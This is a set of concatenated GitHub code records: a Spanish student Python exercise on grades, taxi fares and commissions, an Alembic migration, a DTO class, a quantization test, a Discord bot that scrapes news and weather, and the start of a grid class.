parCercano=\"P2-P5\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_6):\n parCercano=\"P2-P6\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_7):\n parCercano=\"P2-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_8):\n parCercano=\"P2-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_9):\n parCercano=\"P2-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D2_10):\n parCercano=\"P2-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D3)):\n if Geodesica==(D3_4):\n parCercano=\"P3-P4\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_5):\n parCercano=\"P3-P5\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_6):\n parCercano=\"P3-P6\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_7):\n parCercano=\"P3-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_8):\n parCercano=\"P3-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_9):\n parCercano=\"P3-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D3_10):\n parCercano=\"P3-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D4)):\n if Geodesica==(D4_5):\n parCercano=\"P4-P5\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D4_6):\n parCercano=\"P4-P6\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D4_7):\n parCercano=\"P4-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D4_8):\n parCercano=\"P4-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D4_9):\n parCercano=\"P4-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D4_10):\n parCercano=\"P4-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D5)):\n if Geodesica==(D5_6):\n parCercano=\"P5-P6\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D5_7):\n 
parCercano=\"P5-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D5_8):\n parCercano=\"P5-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D5_9):\n parCercano=\"P5-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D5_10):\n parCercano=\"P5-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D6)):\n if Geodesica==(D6_7):\n parCercano=\"P6-P7\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D6_8):\n parCercano=\"P6-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D6_9):\n parCercano=\"P6-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D6_10):\n parCercano=\"P6-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D7)):\n if Geodesica==(D7_8):\n parCercano=\"P7-P8\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D7_9):\n parCercano=\"P7-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D7_10):\n parCercano=\"P7-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(min(list_D8)):\n if Geodesica==(D8_9):\n parCercano=\"P8-P9\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n elif Geodesica==(D8_10):\n parCercano=\"P8-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\n\nif Geodesica==(D9_10):\n if Geodesica==(D9_10):\n parCercano=\"P9-P10\"\n print(\"El par mas cercano es el punto\",parCercano,\"con\",Geodesica)\nparCercano=parCercano\n\n\n#------------------------ EJERCICIO 3 --------------------------------\n\"\"\"\nLa calificación de informatica se encuentra en el intervalo [0,5] y se calcula tomando 5 notas, \ncon porcentajes de 10%, 20%, 15%, 20% y 35%. 
La materia se aprueba por encima de 3.0\nLos siguientes estudiantes tienen las primeras 4 calificaciones definidas.\ncod Nombre Nota1 Nota2 Nota3 Nota4 Nota 5\n01 Miguel Pineda 1.0 1.1 2.3 1.1 ?\n02 Maria Gonzalez 3.1 3.1 1.2 3.0 ?\n03 Jose Nuñez 5.0 4.0 2.5 5.0 ?\n04 Angelica Lozano 3.1 1.0 2.6 1.0 ?\n05 Camilo Suarez 3.2 4.0 1.1 3.0 ?\n06 Mariana Rosero 5.0 5.0 5.0 3.9 ?\n07 Esteban Quesada 3.4 4.0 2.6 3.2 ?\n08 Julia Quintero 2.0 2.2 2.1 4.2 ?\n09 Mauricio Lizcano 3.7 4.1 4.7 4.0 ?\n10 Angie Gomez 4.1 4.7 4.4 5.0 ?\n11 Camilo Restrepo 5.0 5.0 1.0 3.2 ?\n12 Mauricio Velazquez 5.0 4.2 2.1 5.0 ?\n13 Esteban Rodriguez 3.2 4.1 2.2 3.3 ?\n Determine cuantos estudiantes pierden aúnque obtengan la mejor nota_5\n Determine cuantos estudiantes ganan aunque obtengan la peor nota_5\n Determine cuantos estudiantes tienen posibilidades de pasar\n Almacene sus resultados en una lista llamada estudiantes, tal como se muestra:\n estudiantes = [Cantidad_que_pierden, Cantidad_que_ganan, Cantidad_con_posibilidades]\n\"\"\"\n\nprint(\"\\n----- EJERCICIO 3 -----\")\n\n# Calcula la nota que lleva el alumno, sin contar la Nota 5\nStud_01=(1*0.10)+(1.1*0.20)+(2.3*0.15)+(1.1*0.20)\nStud_02=(3.1*0.10)+(3.1*0.20)+(1.2*0.15)+(3*0.20)\nStud_03=(5*0.10)+(4*0.20)+(2.5*0.15)+(5*0.20)\nStud_04=(3.1*0.10)+(1*0.20)+(2.6*0.15)+(1*0.20)\nStud_05=(3.2*0.10)+(4*0.20)+(1.1*0.15)+(3*0.20)\nStud_06=(5*0.10)+(5*0.20)+(5*0.15)+(3.9*0.20)\nStud_07=(3.4*0.10)+(4*0.20)+(2.6*0.15)+(3.2*0.20)\nStud_08=(2*0.10)+(2.2*0.20)+(2.1*0.15)+(4.2*0.20)\nStud_09=(3.7*0.10)+(4.1*0.20)+(4.7*0.15)+(4*0.20)\nStud_10=(4.1*0.10)+(4.7*0.20)+(4.4*0.15)+(5*0.20)\nStud_11=(5*0.10)+(5*0.20)+(1*0.15)+(3.2*0.20)\nStud_12=(5*0.10)+(4.2*0.20)+(2.1*0.15)+(5*0.20)\nStud_13=(3.2*0.10)+(4.1*0.20)+(2.2*0.15)+(3.3*0.20)\n\n\"Esta es la mejor nota 5\"\nnota_5=5*0.35 \n\n# 1-1. Compara la nota final con la mejor nota 5 y si es verdadero, el alumno pierde la materia\nB_nota_5_Stud_01 = Stud_01+nota_5 < 3\nB_nota_5_Stud_02 = Stud_02+nota_5 < 3\nB_nota_5_Stud_03 = Stud_03+nota_5 < 3\nB_nota_5_Stud_04 = Stud_04+nota_5 < 3\nB_nota_5_Stud_05 = Stud_05+nota_5 < 3\nB_nota_5_Stud_06 = Stud_06+nota_5 < 3\nB_nota_5_Stud_07 = Stud_07+nota_5 < 3\nB_nota_5_Stud_08 = Stud_08+nota_5 < 3\nB_nota_5_Stud_09 = Stud_09+nota_5 < 3\nB_nota_5_Stud_10 = Stud_10+nota_5 < 3\nB_nota_5_Stud_11 = Stud_11+nota_5 < 3\nB_nota_5_Stud_12 = Stud_12+nota_5 < 3\nB_nota_5_Stud_13 = Stud_13+nota_5 < 3\n\n# 1-2. Para la condicion 1 si la nota final del alumno es verdad entonces pierde.\npierde=0 # Contador de los que pierden\nif B_nota_5_Stud_01==True:\n pierde=1+pierde\nif B_nota_5_Stud_02==True:\n pierde=1+pierde\nif B_nota_5_Stud_03==True:\n pierde=1+pierde\nif B_nota_5_Stud_04==True:\n pierde=1+pierde\nif B_nota_5_Stud_05==True:\n pierde=1+pierde\nif B_nota_5_Stud_06==True:\n pierde=1+pierde\nif B_nota_5_Stud_07==True:\n pierde=1+pierde\nif B_nota_5_Stud_08==True:\n pierde=1+pierde\nif B_nota_5_Stud_09==True:\n pierde=1+pierde\nif B_nota_5_Stud_10==True:\n pierde=1+pierde\nif B_nota_5_Stud_11==True:\n pierde=1+pierde\nif B_nota_5_Stud_12==True:\n pierde=1+pierde\nif B_nota_5_Stud_13==True:\n pierde=1+pierde\nCantidad_que_pierden=pierde\n\n# 2-1. 
Verifica quienes ganan la materia con la peor nota 5\nP_nota5_Stud_01 = Stud_01 >=3\nP_nota5_Stud_02 = Stud_02 >=3\nP_nota5_Stud_03 = Stud_03 >=3\nP_nota5_Stud_04 = Stud_04 >=3\nP_nota5_Stud_05 = Stud_05 >=3\nP_nota5_Stud_06 = Stud_06 >=3\nP_nota5_Stud_07 = Stud_07 >=3\nP_nota5_Stud_08 = Stud_08 >=3\nP_nota5_Stud_09 = Stud_09 >=3\nP_nota5_Stud_10 = Stud_10 >=3\nP_nota5_Stud_11 = Stud_11 >=3\nP_nota5_Stud_12 = Stud_12 >=3\nP_nota5_Stud_13 = Stud_13 >=3\n\n# 2-2. Para la condicion 2, si la nota final del alumno es verdadera, entonces gana la materia con la peor nota 5\nganan=0 # Contador de los que ganan\n\nif P_nota5_Stud_01==True:\n ganan=1+ganan\nif P_nota5_Stud_02==True:\n ganan=1+ganan\nif P_nota5_Stud_03==True:\n ganan=1+ganan\nif P_nota5_Stud_04==True:\n ganan=1+ganan\nif P_nota5_Stud_05==True:\n ganan=1+ganan\nif P_nota5_Stud_06==True:\n ganan=1+ganan\nif P_nota5_Stud_07==True:\n ganan=1+ganan\nif P_nota5_Stud_08==True:\n ganan=1+ganan\nif P_nota5_Stud_09==True:\n ganan=1+ganan\nif P_nota5_Stud_10==True:\n ganan=1+ganan\nif P_nota5_Stud_11==True:\n ganan=1+ganan\nif P_nota5_Stud_12==True:\n ganan=1+ganan\nif P_nota5_Stud_13==True:\n ganan=1+ganan\nCantidad_que_ganan=ganan\n\n# 3. Cuenta los demás estudiantes, es decir que tienen posibilidades\nCantidad_con_posibilidades=13-Cantidad_que_pierden-Cantidad_que_ganan\n\n# 4. Almacen de los resultados\nestudiantes=[Cantidad_que_pierden,Cantidad_que_ganan,Cantidad_con_posibilidades]\nprint(\"[pierden,ganan,posibilidades]\")\nprint(estudiantes)\n\n\n#------------------------ EJERCICIO 4 --------------------------------\n\n\"\"\" Seis compañeros, contratan un taxi con el objeto de movilizarse juntos a la universidad. \nEl contrato es de lunes a viernes, y deben pagar al taxista $15000 por cada trayecto. \nSe prestarán dos servicios al día, uno de ida y el otro de regreso.\nSin embargo, los seis no se movilizan juntos todos los dias. Por tanto, han planteado que la tarifa\ndebe dividirse entre el numero de compañeros que se movilicen en cada trayecto.En caso, de que ninguno\nutilice el servicio. Deben pagar al taxista una tarifa de $10000, repartidos equitativamente entre todos.\nA continueación veamos el uso del servicio por parte de los compañeros en la última semana de clases:\n IDA | REGRESO\n LUNES MARTES MIERCOLES JUEVES VIERNES | LUNES MARTES MIERCOLES JUEVES VIERNES\nJUAN Si Si Si Si No | Si Si Si No No\nCAMILA Si No Si No Si | Si No No No No\nJOSE Si No Si Si No | Si No Si Si No\nMARIA Si Si Si No No | No No Si No No\nESTEBAN Si No No Si Si | No No No Si No\nANGIE Si No Si No No | Si No Si No No\n¿Cuanto debe pagar cada estudiante? \nAlmacene el resultado dentro de un diccionario llamado \"diccionarioPagos\"\nlas claves deben ser los nombres de los estudiantes (en strings)\ny los valores deben ser el dinero total que pagó cada uno al terminar la semana (en flotantes)\n\"\"\"\n\nprint(\"\\n----- EJERCICIO 4 -----\")\n\n\"Precio del taxi\"\nPay=15000\n\n# Calcula el precio del taxi por su uso\n\"Ida\"\nMon_Ida= Pay/6\nTue_Ida= Pay/2\nWed_Ida= Pay/5\nThu_Ida= Pay/3\nFri_Ida= Pay/2\n\"Regreso\"\nMon_Back= Pay/4\nTue_Back= Pay\nWed_Back= Pay/4\nThu_Back= Pay/2\nFri_Back= 10000/6\n\n# 1. 
A cada uno le calculamos lo que pagaron en la semana.\nJuan = Mon_Ida + Mon_Back + Tue_Ida + Tue_Back + Wed_Ida + Wed_Back + Thu_Ida + Fri_Back\nCamila = Mon_Ida + Mon_Back + Wed_Ida + Fri_Ida + Fri_Back\nJose = Mon_Ida + Mon_Back + Wed_Ida + Wed_Back + Thu_Ida + Thu_Back + Fri_Back\nMaria = Mon_Ida + Tue_Ida + Wed_Ida + Wed_Back + Fri_Back\nEsteban = Mon_Ida + Thu_Ida + Thu_Back + Fri_Ida + Fri_Back\nAngie = Mon_Ida + Mon_Back + Wed_Ida + Wed_Back + Fri_Back\n\n# 2. Pago semanal en el diccionario pedido\ndiccionarioPagos={\"Angie\": Angie, \"Camila\": Camila, \"Esteban\": Esteban, \"Jose\": Jose, \"Juan\": Juan, \"Maria\": Maria}\nprint(diccionarioPagos)\n\n\n#------------------------ EJERCICIO 5 --------------------------------\n\n\"\"\" El salario mensual de un empleado se calcula solo teniendo en cuenta el numero de seguros vendidos,\n (el precio de cada seguro es de $120000)\n Para los primeros 20 seguros vendidos, la comisión es del 20%.\n Para los siguientes 100 seguros las comisión es del 30%.\n Para los siguientes seguros vendidos. La comisión es de 10%.\n El salario de 4 empleados es el siguiente:\n Empleado empleado1 empleado2 empleado3 empleado4\n Salario $ 7860000 $ 5520000 $ 3720000 $ 2280000\n Determine el numero de seguros vendidos por cada empleado.\n Almacene su respuesta en una lista llamada cantidadSegurosVendidos como muestra el ejemplo:\n cantidadSegurosVendidos = [10, 50, 80, 32]\n \"\"\"\n\nprint(\"\\n----- EJERCICIO 5 -----\")\n\n#Salario de los empleados\nempleado_1=7860000\nempleado_2=5520000\nempleado_3=3720000\nempleado_4=2280000\n\nSeg1=20*120000 # salario que se gana por vender 20 seguros\nSeg2=100*120000 # salario que se gana por vender otros 100 seguros\n\ncomi1=Seg1*0.20\ncomi2=Seg2*0.30\n\n# Si la condicion se cumple se da por seguro que vendio mas de 120 seguros y solo hay que hallar la cantidad de seguros restantes\n\n# Para el empleado 1\nif empleado_1 > (comi1 + comi2):\n empleado_1= empleado_1 - (comi1 + comi2)\n Seg_V1= 20 + 100 + (empleado_1/(0.10*120_000)) # Si el N° de seguros vendidos > 120\nelif (empleado_1 > comi1) and (empleado_1 <= comi1 + comi2): # Si no se asegura que vendio > 20\n empleado_1= empleado_1 - comi1\n Seg_V1= 20 + (empleado_1/(0.3*120000)) # N° de seguros vendidos <= 120 y > 20\nelse:\n Seg_V1= empleado_1/(0.2*120000) # N° de seguros vendidos < 20\n\n# Para el empleado 2\nif empleado_2 > (comi1+comi2):\n empleado_2= empleado_2 -(comi1 + comi2)\n Seg_V2=20+100+(empleado_2/(0.10*120_000)) \nelif (empleado_2 > comi1) and (empleado_2 <= comi1 + comi2): \n empleado_2= empleado_2 - comi1\n Seg_V2=20+(empleado_2/(0.3*120_000)) \nelse:\n Seg_V2= empleado_2/(0.2*120_000) \n\n# Para el empleado 3\nif empleado_3 > (comi1+comi2):\n empleado_3= empleado_3 - (comi1+comi2)\n Seg_V3= 20 + 100 + (empleado_3/(0.10*120_000)) \nelif (empleado_3 > comi1) and (empleado_3 <= comi1 + comi2): \n empleado_3= empleado_3 - comi1\n Seg_V3= 20 + (empleado_3/(0.3*120_000)) \nelse:\n Seg_V3= empleado_3/(0.2*120_000) \n\n# Para el empleado 4\nif empleado_4 > (comi1 + comi2):\n empleado_4= empleado_4-(comi1 + comi2)\n Seg_V4=20 + 100 + (empleado_4/(0.10*120_000)) \nelif (empleado_4 > comi1) and (empleado_4 <= comi1 + comi2): \n empleado_4= empleado_4 - comi1\n Seg_V4= 20 + (empleado_4/(0.3*120_000)) \nelse:\n Seg_V4= empleado_4/(0.2*120_000) \n\n# Un paso intermedio para asegurar que la cantidad de seguros sea entera\nSeg_V1= int(Seg_V1)\nSeg_V2= int(Seg_V2)\nSeg_V3= int(Seg_V3)\nSeg_V4= int(Seg_V4)\n\n# 1. 
Se guarda en una lista la cantidad de seguros vendidos por los empleados\ncantidadSegurosVendidos=[Seg_V1,Seg_V2,Seg_V3,Seg_V4]\nprint(\"Cantidad de seguros vendidos: [empleado 1, empleado 2, empleado 3, Empleado 4]\")\nprint(cantidadSegurosVendidos)\n\n\"Finish\"","repo_name":"gitCarlos09/Informatica_2","sub_path":"INFORMES/INFORME1/ejercicios1.py","file_name":"ejercicios1.py","file_ext":"py","file_size_in_byte":21639,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42776189827","text":"\"\"\"empty message\n\nRevision ID: 84a89fe0b190\nRevises: 2f006dc658c5\nCreate Date: 2019-09-16 17:17:58.659496\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '84a89fe0b190'\ndown_revision = '2f006dc658c5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('ticket', sa.Column('order_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'ticket', 'orders', ['order_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'ticket', type_='foreignkey')\n op.drop_column('ticket', 'order_id')\n # ### end Alembic commands ###\n","repo_name":"mq-5/ticketbox","sub_path":"migrations/versions/84a89fe0b190_.py","file_name":"84a89fe0b190_.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19482793875","text":"from dtos import UserDto, ProductDto\n\n\nclass OrderDto:\n def __init__(self, model: dict):\n self.id = str(model['_id'])\n self.user = UserDto(model['user']).get_dict()\n self.address = model['address']\n self.status = model['status']\n self.date = model['date']\n self.products = [{'product': ProductDto(i['product']).get_dict(), 'count': i['count']} for i in model['products']]\n\n def get_dict(self):\n return self.__dict__\n","repo_name":"iHelops/sabina-server","sub_path":"dtos/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"71017693548","text":"#!/usr/bin/env python3\nimport torch\nfrom cyy_torch_toolbox.default_config import DefaultConfig\n\nfrom cyy_torch_algorithm.quantization.qat import QuantizationAwareTraining\n\n\ndef test_training():\n return\n trainer = DefaultConfig(\"CIFAR10\", \"densenet40\").create_trainer()\n trainer.hyper_parameter.set_epoch(1)\n trainer.hyper_parameter.set_learning_rate(0.01)\n qat = QuantizationAwareTraining()\n trainer.append_hook(qat)\n trainer.train()\n","repo_name":"cyyever/torch_algorithm","sub_path":"cyy_torch_algorithm/test/quantization/test_qat.py","file_name":"test_qat.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37290209213","text":"import discord\nimport random\nimport aiohttp\nimport bs4\nimport requests\nimport csv\nimport os.path\nimport pyowm\nfrom discord.ext import commands\n\n\ndescription = '''There are a number of utility commands being showcased here.'''\neolas = commands.Bot(command_prefix='?', description=description)\n\nhello_list = ['Yo', 'yo', 'Hey', 'hey', 'Salut', 'salut', 'Bonjour', 'bonjour']\nfoot_list = ['Neymar', 'neymar','Cavani', 'cavani', 'PSG', 'psg',\n 'Zidane', 
'zidane', 'Real', 'real', 'Madrid', 'madrid',\n             'Barca', 'barca', 'OM', 'Deschamps', 'deschamps', 'Blaise',\n             'blaise']\n\n\n@eolas.event\nasync def on_member_join(member):\n    server = member.server\n    fmt = 'Bienvenue {0.mention} chez {1.name} !'\n    await eolas.send_message(server, fmt.format(member, server))\n\n\n@eolas.event\nasync def on_ready():\n    print('Logged in as')\n    print(eolas.user.name)\n    print(eolas.user.id)\n    print('------')\n\n\n@eolas.event\nasync def on_message(message):\n    if message.content in hello_list:\n        await eolas.send_message(message.channel, \"Salut !\")\n    if any(i in message.content for i in foot_list):\n        await eolas.send_message(message.channel, 'https://media.giphy.com/media/hBO3iUfEtI2s0/giphy.gif')\n        await eolas.send_message(message.channel, \"Non, pas de ça ici, s'il-vous-plaît.\")\n    await eolas.process_commands(message)\n\n\n# ?news - Scrape a specific block on lemonde.fr and return the news from it.\n@eolas.command()\nasync def news():\n    source = requests.get('http://www.lemonde.fr/').text\n    soup = bs4.BeautifulSoup(source, 'lxml')\n    bloc = soup.find('ul', class_='liste_horaire')\n    for news_lm in bloc.find_all('li'):\n\n        hours = news_lm.span.text\n        print(hours)\n\n        try:\n            titles = news_lm.find('a').text\n        except Exception as e:\n            titles = None\n\n        print(titles)\n\n        try:\n            links = news_lm.find('a')['href']\n            lm_link = f'https://www.lemonde.fr/{links}'\n        except Exception as e:\n            lm_link = None\n\n        print(lm_link)\n        print()\n\n        if lm_link is not None:\n            await eolas.say(hours + \"\\n\" + lm_link)\n        else:\n            pass\n\n        filename = 'PATH.csv'\n        fileEmpty = not os.path.exists(filename) or os.stat(filename).st_size == 0  # the file may not exist yet on the first run\n\n        with open(filename, 'a') as csv_file:\n            headers = ['Hours', 'Titles', 'Links']\n\n            csv_writer = csv.DictWriter(csv_file, fieldnames=headers,\n                                        delimiter='\\t')\n            if fileEmpty:\n                csv_writer.writeheader()  # new or empty file, write the header first\n            csv_writer.writerow(\n                {'Hours': hours, 'Titles': titles, 'Links': lm_link})\n\n\n# ?facts - Scrape unkno.com and return the fact from it.\n@eolas.command()\nasync def facts():\n    source = requests.get('http://unkno.com/').text\n    soup = bs4.BeautifulSoup(source, 'lxml')\n    # facts = soup.find('section', class_='body')\n    fact = soup.find('div', id='content')\n    print(fact.text)\n    await eolas.say('Here is your fact: ' + '\\n' + fact.text) \n\n    \n@eolas.command()\nasync def add(left: int, right: int):\n    \"\"\"Adds two numbers together.\"\"\"\n    await eolas.say(left + right)\n\n\n@eolas.command()\nasync def roll(dice: str):\n    \"\"\"Rolls a dice in NdN format.\"\"\"\n    try:\n        rolls, limit = map(int, dice.split('d'))\n    except Exception:\n        await eolas.say('Format has to be in NdN!')\n        return\n\n    result = ', '.join(str(random.randint(1, limit)) for r in range(rolls))\n    await eolas.say(result)\n\n\n@eolas.command(description='For when you wanna settle the score some other way')\nasync def choose(*choices: str):\n    \"\"\"Chooses between multiple choices.\"\"\"\n    await eolas.say(random.choice(choices))\n\n\n@eolas.command()\nasync def repeat(times : int, content='repeating...'):\n    \"\"\"Repeats a message multiple times.\"\"\"\n    for i in range(times):\n        await eolas.say(content)\n\n\n@eolas.command()\nasync def joined(member : discord.Member):\n    \"\"\"Says when a member joined.\"\"\"\n    await eolas.say('{0.name} joined in {0.joined_at}'.format(member))\n\n\n@eolas.group(pass_context=True)\nasync def cool(ctx):\n    \"\"\"Says if a user is cool.\n    In reality this just checks if a subcommand is being invoked.\n    \"\"\"\n    if ctx.invoked_subcommand is 
None:\n await eolas.say('No, {0.subcommand_passed} is not cool'.format(ctx))\n\n\n# ?chess - Print a link of a randomly selected puzzle from Lichess.org\n@eolas.command()\nasync def chess():\n random_number = random.sample(range(1, 125000), 1)\n random_ID = (\"\".join(map(str, random_number)))\n puzzle_link = f'https://lichess.org/training/{(\"\".join(map(str, random_number)))}'\n print('Lichess Puzzle ID:' + '\\n' + random_ID + '\\n')\n await eolas.say('Lichess Puzzle:' + '\\n' + puzzle_link)\n\n\n# ?meteo - Print the forecast of a specific location.\n@eolas.command()\nasync def meteo(*, name):\n owm = pyowm.OWM('OWM_API_KEY', language='fr')\n\n observation = owm.weather_at_place(name)\n weather = observation.get_weather()\n location = observation.get_location()\n get_temperature = weather.get_temperature(unit='celsius')\n get_wind = weather.get_wind()\n\n await eolas.say('Lieu: {}'.format(location.get_name()))\n await eolas.say('Température: {}'.format(get_temperature['temp']) + u'\\N{DEGREE SIGN}C')\n await eolas.say('Vitesse du vent: {}'.format(get_wind['speed']) + ' m/s')\n await eolas.say('Description: {}'.format(weather.get_detailed_status()))\n\n\n# ?cavani - Print a random gif of Cavani.\n@eolas.command()\nasync def cavani():\n cavani_gifs = [\n \"https://media.giphy.com/media/3oKGzl8zDsyKif2xdS/giphy.gif\",\n \"https://media.giphy.com/media/3oKGzi31QTqbppVOjS/giphy.gif\",\n \"https://media.giphy.com/media/l4FsydT8HX6EWau9a/giphy.gif\",\n \"https://media.giphy.com/media/AAvqQob2BUFCo/giphy.gif\",\n \"https://media.giphy.com/media/l1J3Qcd7OmaqfnXQ4/giphy.gif\"]\n\n rand_gif = random.choice(cavani_gifs)\n\n await eolas.say(rand_gif)\n \n \neolas.run('BOT_TOKEN')\n","repo_name":"Mataz/Eolas-Bot","sub_path":"old_mono_file/eolas_bot.py","file_name":"eolas_bot.py","file_ext":"py","file_size_in_byte":6076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31750512139","text":"from numpy import *\r\n\r\n\r\nclass Grid:\r\n\tdef __init__(self, x_min, y_min, dx, dy, l1, l2):\r\n\t\tself.x_min = x_min\r\n\t\tself.y_min = y_min\r\n\t\tself.dx = dx\r\n\t\tself.dy = dy\r\n\t\tself.l1 = l1\r\n\t\tself.l2 = l2\r\n\t\tself.J = 0\r\n\t\tself.data1 = []\r\n\t\tself.data2 = []\r\n\t\tself.x_cell = zeros( (dx+1), dtype = float)\r\n\t\tself.y_cell = zeros( (dy+1), dtype = float)\r\n\t\tfor i in xrange(dx+1):\r\n\t\t\tself.x_cell[i] = self.x_min+l1*i\r\n\t\tfor i in xrange(dy+1):\r\n\t\t\tself.y_cell[i] = self.y_min+l2*i\r\n\t\r\n\tdef get_center_point(self):\r\n\t\tx_centr = (self.x_cell[self.dx]+self.x_min)/2\r\n\t\ty_centr = (self.y_cell[self.dy]+self.y_min)/2\r\n\t\treturn x_centr,y_centr\r\n\t\t\r\n\tdef get_center_points(self):\r\n\t\tself.x_center = zeros( (self.dx), dtype = float)\r\n\t\tself.y_center = zeros( (self.dy), dtype = float)\r\n\t\tself.x_center[0] = self.x_min+self.l1/2\r\n\t\tself.y_center[0] = self.y_min+self.l2/2\r\n\t\tfor i in xrange(self.dx):\r\n\t\t\tself.x_center[i] = self.x_center[0]+self.l1*i\r\n\t\tfor i in xrange(self.dy):\r\n\t\t\tself.y_center[i] = self.y_center[0]+self.l2*i\r\n\t\r\n\tdef get_center_num(self,n):\r\n\t\tfor j in xrange(self.dy):\r\n\t\t\tfor i in xrange(self.dx):\r\n\t\t\t\ts = self.get_cell_num(self.x_center[i], self.y_center[j])\r\n\t\t\t\tif (s == n):\r\n\t\t\t\t\t#print self.x_center[i], self.y_center[j]\r\n\t\t\t\t\treturn self.x_center[i], self.y_center[j]\r\n\t\t\t\t\tbreak\r\n\t\r\n\tdef add_point(self, x, y):\r\n\t\tself.data1.append(x)\r\n\t\tself.data2.append(y)\r\n\t\tself.get_j(x, 
y)\r\n\t\r\n\tdef get_cell_num(self, x, y):\r\n\t\ti_x = 0\r\n\t\ti_y = 0\r\n\t\tN = 0\r\n\t\tfor i in xrange(self.dx):\r\n\t\t\tif (x>self.x_cell[i]):\r\n\t\t\t\ti_x = i\r\n\t\tfor i in xrange(self.dy):\r\n\t\t\tif (y>self.y_cell[i]):\r\n\t\t\t\ti_y = i\r\n\t\tN = i_y*self.dx + i_x\r\n\t\treturn N\r\n\t\r\n\tdef get_point_num(self, n):\r\n\t\tN = 0\r\n\t\tfor i in xrange(len(self.data1)):\r\n\t\t\ts = self.get_cell_num(self.data1[i], self.data2[i])\r\n\t\t\tif (s == n):\r\n\t\t\t\tN = N + 1\r\n\t\treturn N\r\n\t\r\n\tdef get_j(self, x, y):\r\n\t\tn_1 = self.get_cell_num(x,y)\r\n\t\tn = self.get_point_num(n_1)\r\n\t\tif (n == 1):\r\n\t\t\tself.J = self.J + 1\r\n\r\n\tdef get_weights_cell(self):\r\n\t\tw = zeros( (len(self.data1)), dtype = float)\r\n\t\tn = 0\r\n\t\tn_1 = 0\r\n\t\t#print \"J =\", self.J\r\n\t\tfor i in xrange(len(self.data1)):\r\n\t\t\tn_1 = self.get_cell_num(self.data1[i],self.data2[i])\r\n\t\t\tn = self.get_point_num(n_1)\r\n\t\t\tw[i] = 1./(n*self.J)\r\n\t\treturn w\r\n\t\r\n\tdef calc_e_h(self, x_center, y_center, c):\r\n\t\te_h = 0.0\r\n\t\tfor i in xrange(len(self.data1)):\r\n\t\t\te_h = e_h + (sqrt((x_center-self.data1[i])**2+(y_center-self.data2[i])**2))**(-c)\r\n\t\treturn e_h\r\n\t\r\n\tdef calc_h(self, x_center, y_center, j, c):\r\n\t\th = (sqrt((x_center-self.data1[j])**2+(y_center-self.data2[j])**2))**(-c)\r\n\t\treturn h\r\n\t\r\n\tdef calc_hgt(self, x1, y1, 